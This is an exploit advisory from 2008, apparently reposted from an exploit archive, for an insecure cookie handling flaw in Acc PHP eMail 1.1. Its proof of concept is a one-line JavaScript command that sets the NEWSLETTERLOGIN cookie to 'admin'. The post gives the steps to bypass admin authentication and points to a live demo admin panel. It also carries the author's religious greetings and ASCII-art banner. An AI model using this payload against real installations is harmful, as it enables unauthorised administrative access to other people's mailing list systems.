[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Acc PHP eMail 1.1 Insecure Cookie Handling Vulnerability
# Published : 2008-11-03
# Author : Hakxer
# Previous Title : Acc Statistics 1.1Insecure Cookie Handling Vulnerability
# Next Title : MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability


###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___  / /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/  /  / /   / __ / __  / _ / ___/ ___/  / / / _ / __ `/ __ `__ 
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/__, / /_/   ____/____/__,_/___/_/  /____/  /_/  ___/__,_/_/ /_/ /_/ 
        /____/                                           

# [~] Discovered by : Hakxer
# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/mailinglist/
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################

   
   PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin";
         javascript:document.cookie="NEWSLETTERLOGIN=Hakxer";
   
   [~] Admin panel 
   http://www.accscripts.com/mailinglist/demo/index.php
   [~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin";
   [~] Refresh
		

#  Proud To be a Muslim #
#_=END=_#

# www.Syue.com [2008-11-03]